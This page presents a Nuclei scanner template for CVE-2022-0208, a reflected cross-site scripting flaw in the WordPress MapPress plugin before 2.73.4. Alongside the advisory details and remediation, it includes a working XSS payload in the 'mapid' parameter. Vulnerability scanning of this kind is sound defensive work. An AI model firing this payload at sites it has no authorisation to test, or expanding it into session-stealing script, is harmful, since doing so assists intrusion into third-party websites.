Skip to content

WordPress Plugin MapPress <2.73.4 - Cross-Site Scripting

ID: CVE-2022-0208

Severity: medium

Author: edoardottt

Tags: cve2022,cve,mappress,xss,wordpress,wp-plugin,wpscan,mappresspro

WordPress Plugin MapPress before version 2.73.4 does not sanitize and escape the ‘mapid’ parameter before outputting it back in the “Bad mapid” error message, leading to reflected cross-site scripting.

id: CVE-2022-0208
info:
name: WordPress Plugin MapPress <2.73.4 - Cross-Site Scripting
author: edoardottt
severity: medium
description: |
WordPress Plugin MapPress before version 2.73.4 does not sanitize and escape the 'mapid' parameter before outputting it back in the "Bad mapid" error message, leading to reflected cross-site scripting.
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
remediation: |
Update to the latest version of MapPress (2.73.4 or higher) or apply the vendor-provided patch to fix the XSS vulnerability.
reference:
- https://wpscan.com/vulnerability/59a2abd0-4aee-47aa-ad3a-865f624fa0fc
- https://nvd.nist.gov/vuln/detail/CVE-2022-0208
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-0208
cwe-id: CWE-79
epss-score: 0.00106
epss-percentile: 0.42122
cpe: cpe:2.3:a:mappresspro:mappress:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
vendor: mappresspro
product: mappress
framework: wordpress
tags: cve2022,cve,mappress,xss,wordpress,wp-plugin,wpscan,mappresspro
http:
- method: GET
path:
- "{{BaseURL}}/?mapp_iframe=1&mapid=--%3E%3Cimg%20src%20onerror=alert(document.domain)%3E"
matchers-condition: and
matchers:
- type: word
part: header
words:
- "text/html"
- type: word
part: body
words:
- "<img src onerror=alert(document.domain)>"
- "Bad mapid"
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022100a24cf464d2ac0347348286351d3ebbf00a83e78547856532e864aac84f49333b02200f6780e66d70c87ec972b19b1c4f312d910e6c5daaceb052f904a252e7f8b0f1:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-0208.yaml"

View on Github